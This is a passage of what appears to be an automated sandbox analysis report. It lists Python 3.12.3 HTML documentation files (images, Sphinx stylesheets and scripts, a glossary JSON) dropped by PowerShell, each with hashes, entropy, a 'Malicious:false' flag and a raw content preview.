                              File Type:PNG image data, 978 x 175, 8-bit/color RGB, non-interlaced
                              Category:dropped
                              Size (bytes):14979
                              Entropy (8bit):7.907484756754295
                              Encrypted:false
                              SSDEEP:
                              MD5:92E760BA94011039696672615A8FFBC6
                              SHA1:B6A1BDCE450A251D1AB46BC7EEF2970E158761F6
                              SHA-256:B21A9EA9AD785299A282CCCC4B9A93CF9B1F028F65B0E90C0C41DEEA019953BE
                              SHA-512:95528E1D62C27F704FCB0E305A10F2CE1364A0A4A5A66D72E1424957E31D77B1D5C58997C5543273B6AD528D29D1120C665EDCAE8142AC7FDB9FFD947DF59AE0
                              Malicious:false
                              Reputation:unknown
                              Preview:.PNG........IHDR...............q.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............pHYs..........o.d..9.IDATx...{|T.?..s.3........ ...j+...UhC....X.n....nm....U${.Y.....Z.1hk......!@HB..I2..\~..d.$..7K2....N&g2.s..s...9.....j.)...."...[.1..............~.!.0|..~...o.......?F..,.".+.[J.....'.....`3.f.R.....#,../5M......Tb.#...G.;..Zx..........~G.;."...................iw8.F....n..j.w....#.!.0.*.pV.iZ8........Q.J!.o....Rm.....@DF8..X.s'Z0v.c.?.i]..w..-Tb.#...g.[.k........".C)....}..._!.........B.QAA..2v....b...0.;..3..A...$j...#..w...w.n8.L.Q.#.d!g..E."Xl.X...Y.#...!.b'...B!.4....u=...J. ....[..i.=.h..>.$.d..;w.....r..S..C....y.Xl.....j.s..v.&..`.1AH...P`.!./.1VD..9.yx~G.4)e....97B.Fp......w.@4S,..g&..1..@../|.C..".H..Q...eE~i/.F.. . ..@8..4..%..b9..4.>.$|)..@.b...g%..v.D...c@...9..6re....#] <.J).~..@.. !...^V...8h...I...;..E.....\AD.....'vS.;e!.`dw.{f.s....b...9.....X..........W.s.(.,.FhA.u....6.A..,........;CA..'...

                              C:\Users\user\Downloads\Python\Python312\Doc\html\_images\turtle-star.png

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PNG image data, 250 x 250, 8-bit/color RGB, non-interlaced
                              Category:dropped
                              Size (bytes):33808
                              Entropy (8bit):7.9845728693968825
                              Encrypted:false
                              SSDEEP:
                              MD5:9B1263DB04E6421E7032CFED2001A5D3
                              SHA1:5EF1092FDE20E8251CC9592E37B9F22F9F4E87C3
                              SHA-256:B5528A56A8B0F2E5DA3D6F20F47057CC0325273FF152816C202F8A114CD07138
                              SHA-512:E3D6F048380D724A3671817C128E96CFD27ECA14C4C84D88655044E5A37D3C9635DEF1D518F7C6BCC51C0EEEC9F99F8A28E3E4B179ACC05269E8EB0F99E7F826
                              Malicious:false
                              Reputation:unknown
                              Preview:.PNG........IHDR................j....iCCPICC Profile..x..gTS....9.@..zG.t)....l.$@(1.....T`,...:.C......... X....A@...XP.'pA.]w..?wg..~........@.g......I.TQ..3cYD$...`.2..h@fsR......m..@..}#q..L...i./........).$.."....R..;..+#U.0..a...@.O.9v....=.}.9!A.H.8.x2.-........X..Y.a.../@..a.N....v......Y....N...fG/.d.c.x. w".v.....f/..CRb.._....dA...l..>.e.z.0q..fu. 4x^.D...s..=h....?p@.....7....:.l/........sJz..<g...3.....Y.:?...5..k.L D~..........$.F.<.+2."Z.l.. ..[..-..k..D..T..y.y....cl.0315...o..;.[......k.3..."......+.g...d.]S.......4Q.\=.x.."..2@...........v..../..B@.X.8 ..s...Y`....`7..J..P...Ip.4...*......<..`....`.LC...(....T!-..2..!......(....P...m..B..:..@.A..-..z..Bc.[.3......k.ak..{.!.J8.N.3..x'\...'...*|.~.....I.@.Pt....e.rA.."Q1(.j#*.U.*G..Q.....8.......h#.............t5......DO..a(.%......,..b20.."L%...:.!f.3..b.X...........`.a.-.n..v......p.8..........].....>.IxU.........E.....{...4A..E.%....u.].c.f.].0a.(M.!..C...-.bb..:....D"..lH.

                              C:\Users\user\Downloads\Python\Python312\Doc\html\_images\win_installer.png

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PNG image data, 706 x 449, 8-bit/color RGBA, non-interlaced
                              Category:dropped
                              Size (bytes):84383
                              Entropy (8bit):7.964768426071419
                              Encrypted:false
                              SSDEEP:
                              MD5:7114029B0D94D2852D9E6DDF0E909C2B
                              SHA1:B91383E188398914ECBC306FD1A23E26D5118FF9
                              SHA-256:BA9ABF87CADFFA7027CA298BA11CEB6418F3A9ABB32AC988C8D342E7C2B3FB2E
                              SHA-512:5ABE7D97E38E0419E0D5B3505F46871682886A0E7701724A73A1D451B1202327DB6CA0EFF8CB99D653E319DB8F2B46A1057029627E23100FF81EBD5755E37D73
                              Malicious:false
                              Reputation:unknown
                              Preview:.PNG........IHDR.............cn......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............pHYs..........o.d....IDATx...wt\......{}.k..s....k...z<AR..A....Pq.g..H3....:.Mv..R+tnt`...9.`..3.A"....:.r!<..{...s.T@"A.}...@.S'...s...5.jFz.X,...b.X..UaT.\...b.X,....#.......<x......!......r;........<x...c.cHp<, <@.-.#.....<x........j.y.0<......._x.......<x.....UA.@.J........../x.......<x.(3..X..K.q.0\-..r.....C....<x.........Qp...U..U.. \.(............<x...C.:+..c........*!8.....0...6.w.<x.......<...b..K.q5.pI....+.............<x.....6......s.... 8.............<x.......<xD...0..~. ....a8..+D". X'r.~....r..r...<x.......7....../.?.....@....a......Q..{r..@..?...........?........<x.......<xhCg.?..IpL...h.q%.......J.L...K..G...........?......."......<x.....6....d......._E.%...@..H..i.......z...C..........jjj.{MM..#......<x......C...q......4@.?%...i....J..b......rC..#.<..<x.......<FjH..`8....+\..+....B..>9<x.......<F....t..(....*a.".... L...w..

                              C:\Users\user\Downloads\Python\Python312\Doc\html\_static\basic.css

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):16018
                              Entropy (8bit):4.801847554025832
                              Encrypted:false
                              SSDEEP:
                              MD5:CB95906BC97133CE646BC7BFB1119A5C
                              SHA1:6B5620D53347075F849736D7D3594573589162A9
                              SHA-256:5251A8124C61A4B37AA0A7DC2DED6422E0E8296F854F6D5FA59B8A8DE2A6E5D9
                              SHA-512:2E992E4AD916EE7B17454A700EE0892AA224932079F70D79F8F43B197F9FA71ADB2FCFCB26AB5F7209078587E3BB58D07A1EE99319BEA90B6951A649877A72A5
                              Malicious:false
                              Reputation:unknown
                              Preview:/*.. * basic.css.. * ~~~~~~~~~.. *.. * Sphinx stylesheet -- basic theme... *.. * :copyright: Copyright 2007-2023 by the Sphinx team, see AUTHORS... * :license: BSD, see LICENSE for details... *.. */..../* -- main layout ----------------------------------------------------------- */....div.clearer {.. clear: both;..}....div.section::after {.. display: block;.. content: '';.. clear: left;..}..../* -- relbar ---------------------------------------------------------------- */....div.related {.. width: 100%;.. font-size: 90%;..}....div.related h3 {.. display: none;..}....div.related ul {.. margin: 0;.. padding: 0 0 0 10px;.. list-style: none;..}....div.related li {.. display: inline;..}....div.related li.right {.. float: right;.. margin-right: 5px;..}..../* -- sidebar --------------------------------------------------------------- */....div.sphinxsidebarwrapper {.. padding: 10px 5px 0 10px;..}....div.sphinxsidebar {.. float: left;.. width: 230

                              C:\Users\user\Downloads\Python\Python312\Doc\html\_static\changelog_search.js

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1976
                              Entropy (8bit):4.644530815662487
                              Encrypted:false
                              SSDEEP:
                              MD5:B75610C76C03CB7E3F1C47ED9AECB54E
                              SHA1:444C7F390FA904085C8E85642240473E45E79D61
                              SHA-256:5CAEFAA11B03B3A7451FD521A841272B9C670AE333C53D265151E65CD647483C
                              SHA-512:2CA688C7BA1875E54171566BDE3B735408124D1246BE4C1BC8E02DD76E26E608514FBF79C096E01BB11D5F548ABBBAF1A519BDFD2B91AE3D4BD884D5AEBED7D3
                              Malicious:false
                              Reputation:unknown
                              Preview:document.addEventListener("DOMContentLoaded", function () {.. // add the search form and bind the events.. document.. .querySelector("h1").. .insertAdjacentHTML(.. "afterend",.. [.. "<p>Filter entries by content:",.. '<input type="text" value="" id="searchbox" style="width: 50%">',.. '<input type="submit" id="searchbox-submit" value="Filter"></p>',.. ].join("\n"),.. );.... function doFilter() {.. let query;.. try {.. query = new RegExp(document.querySelector("#searchbox").value, "i");.. } catch (e) {.. return; // not a valid regex (yet).. }.. // find headers for the versions (What's new in Python X.Y.Z?).. const h2s = document.querySelectorAll("#changelog h2");.. for (const h2 of h2s) {.. let sections_found = 0;.. // find headers for the sections (Core, Library, etc.).. const h3s = h2.parentNode.querySelectorAll("h3");.. for (const h3 of h3s) {.. let entries_found = 0;.. //

                              C:\Users\user\Downloads\Python\Python312\Doc\html\_static\classic.css

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):5744
                              Entropy (8bit):4.963403524057622
                              Encrypted:false
                              SSDEEP:
                              MD5:60F6A7572281531726D2174C47CA3938
                              SHA1:280575B81AF62CB70F115A149C44F83CB825A8E4
                              SHA-256:22FE227926A455195858421E5D0DC6FB5F22717F38267E8E5CA323502870098E
                              SHA-512:D1710F6B55AD0F037BBA8B88195401435BD43D12A4BB068E631FFA435021C27D1A254D6B3E92450549DCC8C40D1900FF5B99616316BD447B6E1BDA791828F19F
                              Malicious:false
                              Reputation:unknown
                              Preview:/*.. * classic.css_t.. * ~~~~~~~~~~~~~.. *.. * Sphinx stylesheet -- classic theme... *.. * :copyright: Copyright 2007-2023 by the Sphinx team, see AUTHORS... * :license: BSD, see LICENSE for details... *.. */....@import url("basic.css");..../* -- page layout ----------------------------------------------------------- */....html {.. /* CSS hack for macOS's scrollbar (see #1125) */.. background-color: #FFFFFF;..}....body {.. font-family: -apple-system, BlinkMacSystemFont, avenir next, avenir, segoe ui, helvetica neue, helvetica, Cantarell, Ubuntu, roboto, noto, arial, sans-serif;.. font-size: 100%;.. background-color: white;.. color: #000;.. margin: 0;.. padding: 0;..}....div.document {.. display: flex;.. background-color: white;..}....div.documentwrapper {.. float: left;.. width: 100%;..}....div.bodywrapper {.. margin: 0 0 0 230px;..}....div.body {.. background-color: white;.. color: #222222;.. padding: 0 20px 30px 20px;..}....div.footer {

                              C:\Users\user\Downloads\Python\Python312\Doc\html\_static\copybutton.js

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):3508
                              Entropy (8bit):4.461888105802553
                              Encrypted:false
                              SSDEEP:
                              MD5:0E50832AB2FD7BF08237149FF985E178
                              SHA1:C6B09E18028914CF6718EE00E88EA7436C9C862A
                              SHA-256:2D278D2F6F600CD2A0DDFBF8ADF71BF2DFBCC641FA1E8CE909B25723D16E3BA5
                              SHA-512:E81B7DD87B9E9DA57507D516E5A7DE13E98298BBFADAE60A719102395163A887FAF6C571A4B488D278A5D6CCBA00A19E675502EBFED3A8D093C2B0E523A05AF9
                              Malicious:false
                              Reputation:unknown
                              Preview:// ``function*`` denotes a generator in JavaScript, see.// https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/function*.function* getHideableCopyButtonElements(rootElement) {. // yield all elements with the "go" (Generic.Output),. // "gp" (Generic.Prompt), or "gt" (Generic.Traceback) CSS class. for (const el of rootElement.querySelectorAll('.go, .gp, .gt')) {. yield el. }. // tracebacks (.gt) contain bare text elements that need to be. // wrapped in a span to hide or show the element. for (let el of rootElement.querySelectorAll('.gt')) {. while ((el = el.nextSibling) && el.nodeType !== Node.DOCUMENT_NODE) {. // stop wrapping text nodes when we hit the next output or. // prompt element. if (el.nodeType === Node.ELEMENT_NODE && el.matches(".gp, .go")) {. break. }. // if the node is a text node with content, wrap it in a. // span element so that we

                              C:\Users\user\Downloads\Python\Python312\Doc\html\_static\default.css

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):28
                              Entropy (8bit):4.06610893983748
                              Encrypted:false
                              SSDEEP:
                              MD5:0000E4EA89F1C9F5739B7F36D88477DA
                              SHA1:B9D1252F212DEFA2013AB47A83A1D0217155888C
                              SHA-256:F3D74D09F9A0D5C08E9EF211AFED3397ACE994A39748325AE53BEA62124348B1
                              SHA-512:80A17368195F3E41B48EE0B86D94839943CDF7C1AECE0D6D1524D297B25837589CAC78B26A497336A3997542BF801791648A71CFB80EDB018C32E3F179047E8F
                              Malicious:false
                              Reputation:unknown
                              Preview:@import url("classic.css");.

                              C:\Users\user\Downloads\Python\Python312\Doc\html\_static\doctools.js

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):4472
                              Entropy (8bit):5.0585230241764325
                              Encrypted:false
                              SSDEEP:
                              MD5:C11D2DE693BE9FB96BC1C8A9A35D4002
                              SHA1:C577AFA99AF5347B1E4F0E350A07E5D400464A99
                              SHA-256:3D62B81F63B0418A39A8F5A323203D88DDAFC8C5226F86D311970025D86D7B6C
                              SHA-512:E2B65FC609C4DB774C58881347BEF0B3C80E4A2B3A048D2935EC688CC6AAFA4B4A5DD3619953128AE60B6896134C0FC00506E78D2E4169A14F32AEE9A4C877A8
                              Malicious:false
                              Reputation:unknown
                              Preview:/*. * doctools.js. * ~~~~~~~~~~~. *. * Base JavaScript utilities for all Sphinx HTML documentation.. *. * :copyright: Copyright 2007-2023 by the Sphinx team, see AUTHORS.. * :license: BSD, see LICENSE for details.. *. */."use strict";..const BLACKLISTED_KEY_CONTROL_ELEMENTS = new Set([. "TEXTAREA",. "INPUT",. "SELECT",. "BUTTON",.]);..const _ready = (callback) => {. if (document.readyState !== "loading") {. callback();. } else {. document.addEventListener("DOMContentLoaded", callback);. }.};../**. * Small JavaScript module for the documentation.. */.const Documentation = {. init: () => {. Documentation.initDomainIndexTable();. Documentation.initOnKeyListeners();. },.. /**. * i18n support. */. TRANSLATIONS: {},. PLURAL_EXPR: (n) => (n === 1 ? 0 : 1),. LOCALE: "unknown",.. // gettext and ngettext don't access this so that the functions. // can safely bound to a different name (_ = Documentation.gettext). gettext: (string) => {. const translated = Docume

                              C:\Users\user\Downloads\Python\Python312\Doc\html\_static\documentation_options.js

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):341
                              Entropy (8bit):4.998813699121702
                              Encrypted:false
                              SSDEEP:
                              MD5:0EDC96A6A4FB357EBF75A6E7E1E20900
                              SHA1:10F0C8971B7EC6D3A24F3B7B60ADCA0A7574A067
                              SHA-256:9D21CA41024B088E7DC1F227CEF5FC5AB20C2F05F049EEF961DA09234E24A148
                              SHA-512:25E56DCB680AF9E4D79637259BC0D04832CEAC60175717C881AAB32F8FAD8F35D16B8FE182F6F711EAFDD20818FB2FEE1444323D8B1CB586F25FB577CE668F2C
                              Malicious:false
                              Reputation:unknown
                              Preview:const DOCUMENTATION_OPTIONS = {.. VERSION: '3.12.3',.. LANGUAGE: 'en',.. COLLAPSE_INDEX: false,.. BUILDER: 'html',.. FILE_SUFFIX: '.html',.. LINK_SUFFIX: '.html',.. HAS_SOURCE: true,.. SOURCELINK_SUFFIX: '.txt',.. NAVIGATION_WITH_KEYS: false,.. SHOW_SEARCH_SUMMARY: true,.. ENABLE_SEARCH_SHORTCUTS: true,..};

                              C:\Users\user\Downloads\Python\Python312\Doc\html\_static\file.png

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                              Category:dropped
                              Size (bytes):286
                              Entropy (8bit):6.982817860477681
                              Encrypted:false
                              SSDEEP:
                              MD5:BA0C95766A77A6C598A7CA542F1DB738
                              SHA1:51FD2E4EC924E822C5D434FA98CCFC70C30380F5
                              SHA-256:5C4BC9A16AEBF38C4B950F59B8E501CA36495328CB9EB622218BCE9064A35E3E
                              SHA-512:0426FE38986987303F6076D52EF28BDCF4F3AC2858E0780557471F2D0F3E055745687D0905357C6A0CD7E6F5DD1EF8FE82FF311E44499F89AB6299A41B67D8E6
                              Malicious:false
                              Reputation:unknown
                              Preview:.PNG........IHDR................a....IDATx....R.....){.l. ....f.=@....:...3..~.......rX$A...X-.D.~............(.P.%......8<<.9::.....P...O&.$.....l~.X.....&....EW..^4.w.Q}......^.............i....0/H/.@F).Dzq+..j..[..SU5......h../.oY..G&Lfs|......{.....3%.U.+S..`AF.....IEND.B`.

                              C:\Users\user\Downloads\Python\Python312\Doc\html\_static\glossary.json

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):146694
                              Entropy (8bit):4.801719470012649
                              Encrypted:false
                              SSDEEP:
                              MD5:FFC141EE0F44F0B1570B67A99E6CC374
                              SHA1:805534F98BCE92756D242B5FCE554975194A5BDD
                              SHA-256:2D9C095B96F798D19AC468627BD066CE4E4CF5DCBEF43664E9943257B66CA99B
                              SHA-512:42B9DBAFCBE2347768BC7375F11D1DDC4F95F6F1DA71B2AF5AD156D1066053BB704B585FC4547605A4FF73FA9FFE3AD8F7C8DF5AC577673AFFAB9957C6625DDB
                              Malicious:false
                              Reputation:unknown
                              Preview:{">>>": {"title": ">>>", "body": "<main>\n<dd><p>The default Python prompt of the interactive shell. Often seen for code\nexamples which can be executed interactively in the interpreter.</p>\n</dd>\n</main>\n"}, "...": {"title": "...", "body": "<main>\n<dd><p>Can refer to:</p>\n<ul class=\"simple\">\n<li><p>The default Python prompt of the interactive shell when entering the\ncode for an indented code block, when within a pair of matching left and\nright delimiters (parentheses, square brackets, curly braces or triple\nquotes), or after specifying a decorator.</p></li>\n<li><p>The <a class=\"reference internal\" href=\"library/constants.html#Ellipsis\" title=\"Ellipsis\"><code class=\"xref py py-const docutils literal notranslate\"><span class=\"pre\">Ellipsis</span></code></a> built-in constant.</p></li>\n</ul>\n</dd>\n</main>\n"}, "2to3": {"title": "2to3", "body": "<main>\n<dd><p>A tool that tries to convert Python 2.x code to Python 3.x code by\nhandling most of the incompatibiliti

                              C:\Users\user\Downloads\Python\Python312\Doc\html\_static\language_data.js

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4957
                              Entropy (8bit):4.706694430371463
                              Encrypted:false
                              SSDEEP:
                              MD5:1F1730A3FF00B31B7C2453000CE4F5CB
                              SHA1:D39E65623BCF26D762FC67A82DC97526D0BF3798
                              SHA-256:A889DDDC136E6E32DB953C4588618ECD9D482BF1FBACE3168F5008BB868C33E7
                              SHA-512:C525A0185430C6B287BC25FFE8FA6763ECD9963470A8930CD461FF675C2ED8E6FC672FB69824E155BF209240B9729BCE40285F376A04478D04D1946149CC6349
                              Malicious:false
                              Reputation:unknown
                              Preview:/*.. * language_data.js.. * ~~~~~~~~~~~~~~~~.. *.. * This script contains the language-specific data used by searchtools.js,.. * namely the list of stopwords, stemmer, scorer and splitter... *.. * :copyright: Copyright 2007-2023 by the Sphinx team, see AUTHORS... * :license: BSD, see LICENSE for details... *.. */....var stopwords = ["a", "and", "are", "as", "at", "be", "but", "by", "for", "if", "in", "into", "is", "it", "near", "no", "not", "of", "on", "or", "such", "that", "the", "their", "then", "there", "these", "they", "this", "to", "was", "will", "with"];....../* Non-minified version is copied as a separate JS file, is available */..../**.. * Porter Stemmer.. */..var Stemmer = function() {.... var step2list = {.. ational: 'ate',.. tional: 'tion',.. enci: 'ence',.. anci: 'ance',.. izer: 'ize',.. bli: 'ble',.. alli: 'al',.. entli: 'ent',.. eli: 'e',.. ousli: 'ous',.. ization: 'ize',.. ation: 'ate',.. ator: 'ate',.. alism: 'al',.. iveness

                              C:\Users\user\Downloads\Python\Python312\Doc\html\_static\menu.js

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):2137
                              Entropy (8bit):4.61501159702344
                              Encrypted:false
                              SSDEEP:
                              MD5:4769AC04FE66AE519264AB18F6B85993
                              SHA1:8DB5C986C6C4602B11B4603034B6BDB954FCA60F
                              SHA-256:266ACA0F4F3FE828828101F7D80B3D020892895FAD8757D922756B9930A28730
                              SHA-512:15CA50998BBC89FB7D2522DF44800101615D93FF3D7684C6FC20389C0E8DB5A9AB7E98C1E8E041A9EF61E56BC82794A1B0F436B0311B421BBF3135AFB494A11F
                              Malicious:false
                              Reputation:unknown
                              Preview:document.addEventListener("DOMContentLoaded", function () {.. // Make tables responsive by wrapping them in a div and making them scrollable. const tables = document.querySelectorAll("table.docutils"). tables.forEach(function(table){. table.outerHTML = '<div class="responsive-table__container">' + table.outerHTML + "</div>". }).. const togglerInput = document.querySelector(".toggler__input"). const togglerLabel = document.querySelector(".toggler__label"). const sideMenu = document.querySelector(".menu-wrapper"). const menuItems = document.querySelectorAll(".menu"). const doc = document.querySelector(".document"). const body = document.querySelector("body").. function closeMenu() {. togglerInput.checked = false. sideMenu.setAttribute("aria-expanded", "false"). sideMenu.setAttribute("aria-hidden", "true"). togglerLabel.setAttribute("aria-pressed", "false"). body.style.overflow = "visible". }. function openMe

                              C:\Users\user\Downloads\Python\Python312\Doc\html\_static\minus.png

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PNG image data, 11 x 11, 8-bit grayscale, non-interlaced
                              Category:dropped
                              Size (bytes):90
                              Entropy (8bit):5.021779901931872
                              Encrypted:false
                              SSDEEP:
                              MD5:36B1A4B05451C7ACDE7CED60B2F6BC21
                              SHA1:89F4178F1F917AD03726F307FE6D2E28D6A1706A
                              SHA-256:47E7FC50DB3699F1CA41CE9A2FFA202C00C5D1D5180C55F62BA859B1BD6CC008
                              SHA-512:EAD39ADF0CBB8BF803977F277632B42C62AAEEDA8E4A57DD263AAA0851562BA27F069320B2EB29B7ED93D1682A965ECD61826BDF1CB2E15A68F08AE88DDD05CF
                              Malicious:false
                              Reputation:unknown
                              Preview:.PNG........IHDR...............(....!IDATx.c8...g>@.;(..!.&...........].f2n..N....IEND.B`.

                              C:\Users\user\Downloads\Python\Python312\Doc\html\_static\og-image.png

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PNG image data, 200 x 200, 8-bit/color RGBA, non-interlaced
                              Category:dropped
                              Size (bytes):14572
                              Entropy (8bit):7.96364542989978
                              Encrypted:false
                              SSDEEP:
                              MD5:971B2D0C44CB83CBD37FDCFD4E50E794
                              SHA1:D7C47BAE9A65CAD00E0A8B0FA0746B18FAEFDABA
                              SHA-256:AACC80A7392C51D971A98EF3DAE6C908D9A14229615C83A5DB97521DC4102C1E
                              SHA-512:E70F5F50BE8A932B73F973BC390804DD747367B8AC65E94B2AD140E3B5D4729AAC31FF0FA7070F895E5676555E3F87651FEDC0A394EDC9A3979D7C18B76D07E7
                              Malicious:false
                              Reputation:unknown
                              Preview:.PNG........IHDR..............X....8.IDATx..y.\U...]{.SCWw.....2&....E.... .....-2..L...|.hu.LI..T.=.c.U.4....@.)Q.....C.S.....TUW..uNM].].....>g..]k.Mh...q.=...4.....q4.. ..q4.i....H-.L.(h.....-T.x.{~.-.H..G..O0.....L<...3..b43...!f.....df.D.........61.....3......H...oi.o......R..O....1.R4*.@..m......O.h......n......j.O[.z...>.s....-.e...yo0.`pD.&.i..03....5....`....3.v.is%01.)..d.. r.f&....R......]D.&C.I..4..d.m...k..Gn>o0...E.F........$.g...%.....0.'..?....k>R..D..].&..k..v..v.Z...L.`d...C.....`b..g..<..3s.g"fh@.L...0...G.........ZA..._.Bna.G.V....Dw..~...9....y..LU0XtwP......L.F..O..2..#.....c...Z.&rI...k.....cH.}..sx.ap..'g0. .s..9......A.;b.....,.4@..H@.I@.-.|....u.o...{..nx.).H{{..\=...<c.I`:...D 8...,...Y+rMX.3.{..c.....-<.1t...;...f.#1..0.$d...H..~...?..!.z.bN......wu..........l..T.<ZH.v*....f..1.. oWp.F.'.*.s..%.......0.a(;. q.J.}w......@g'....L..<.e....O..uF t.vl8VB.K.H'.e....Jy.c...{.<....23k......S;...Ywc..#.m..IzD.Q.......2.

                              C:\Users\user\Downloads\Python\Python312\Doc\html\_static\opensearch.xml

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):546
                              Entropy (8bit):5.147712648147712
                              Encrypted:false
                              SSDEEP:
                              MD5:FE5C6EBA8E34208205DCA55FA0281322
                              SHA1:1400F18FE4B664BE2CBE153454BD541FD2869764
                              SHA-256:44E2A28AAF473DCCF6AA6FB71681683524C4C6384CEA6AD4C2F1708E2121AB28
                              SHA-512:E814976CC74A51D034A1988DCAE06B69A0920E7CD90697C4D4D047F32AE526F6472FB3AAB85C1B81300CFEE2B2E99E29A0BAE530A4ADFEC10E5ABDFDC84D0BEE
                              Malicious:false
                              Reputation:unknown
                              Preview:<?xml version="1.0" encoding="UTF-8"?>..<OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/">.. <ShortName>Python</ShortName>.. <Description>Search Python 3.12.3 documentation</Description>.. <InputEncoding>utf-8</InputEncoding>.. <Url type="text/html" method="get".. template="https://docs.python.org/3.12/search.html?q={searchTerms}"/>.. <LongName>Python 3.12.3 documentation</LongName>..<Image height="16" width="16" type="image/x-icon">https://www.python.org/images/favicon16x16.ico</Image>..</OpenSearchDescription>

                              C:\Users\user\Downloads\Python\Python312\Doc\html\_static\plus.png

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PNG image data, 11 x 11, 8-bit grayscale, non-interlaced
                              Category:dropped
                              Size (bytes):90
                              Entropy (8bit):4.968947818574501
                              Encrypted:false
                              SSDEEP:
                              MD5:0D7849FD4D4148B7F78CAB60A087633A
                              SHA1:365ABE63DE063EF2D97D3CAACC43512415B5A835
                              SHA-256:54115199B96A130CBA02147C47C0DEB43DCC9B9F08B5162BBA8642B34980AC63
                              SHA-512:5A34F6B12A015E45E5E3F785D42CF75BD6CB2850C3D0BD85FC59D8EDBAB0A6543A9BBDC0A8A29A7F30BAF96B7780D0F87247B90B9597ED0FD265A8E50612AC4C
                              Malicious:false
                              Reputation:unknown
                              Preview:.PNG........IHDR...............(....!IDATx.c8...g>@.;([..[...U...@l...-!a...@.....IEND.B`.

                              C:\Users\user\Downloads\Python\Python312\Doc\html\_static\py.png

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                              Category:dropped
                              Size (bytes):695
                              Entropy (8bit):7.472596258888605
                              Encrypted:false
                              SSDEEP:
                              MD5:A721FC7EC672275E257BBBFDE49A4D4E
                              SHA1:88D4484552C4BEAC33D9A0848F523AAA66AAD78C
                              SHA-256:AE173DC4842351FC1C8A551AFBDB58CB2B295490782130DAA4F359A6A80D7256
                              SHA-512:7879A2953ACC3762C9ED55A19357BA12AD0B8BDB4E08DA9E3F21CB2853A481F8B1B4665FD03FB6F932F50450594193224CEEC10FE464B31936416E6584AEE9CD
                              Malicious:false
                              Reputation:unknown
                              Preview:.PNG........IHDR................a....sRGB.........bKGD..............pHYs.................tIME.....8!.3'^...7IDAT8.e.OHUA...{.w{"....&hS.6.Z...mB*xP..MQ...A. ".)mZH... F.EF......2.....y3g........;.7..]....3i.s.v.M.....U.....}..\...x'.G.j.N,.Z.X.wQ....1 *.{.8k9.g.'v;..;.j./.t?|..[{\...N..j.E.%g..J=M}.W.....}x..v.^.{..Tn.J...N....\}..X.n..zw/..umY5;mg....Q."..SQ.}..,./.|..i...'}..S...@.B.................Wk..)`..j'..J/N.K@...e1M..FN,j}yhb.wp..+..K.S..Xb....@.:........_.=mU.5.EqR.'.4I.N.&t:..c.....j..l.....`zF..6..gu.G.f.pm".......J..(p..o.....q.G.0."....n...:".,.%8...4...+!..`..DoY-...4..,..5.3.......gob.;..3c..]..I...i...C....h.\nf]..................IEND.B`.

                              C:\Users\user\Downloads\Python\Python312\Doc\html\_static\py.svg

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:SVG Scalable Vector Graphics image
                              Category:dropped
                              Size (bytes):2041
                              Entropy (8bit):4.73858862289631
                              Encrypted:false
                              SSDEEP:
                              MD5:0AC021A9F4CAE16DF1939CC056AEA75B
                              SHA1:7AB79AB732C9EAC4421A2CE0628E6C09155E5CB2
                              SHA-256:5865BE8BCC0AF888594903EA0112F6C8D923C5726C4081E8C856110CC7339CEF
                              SHA-512:C64D320499DCAE4D3D94ED34FBB741A0335761726276F7FE07D6AD1971742F5F2F3DA25CABBA8A63A7B7BB6CF9CAC9AF71B902CEB03644D2BEE84A24ECFE23E5
                              Malicious:false
                              Reputation:unknown
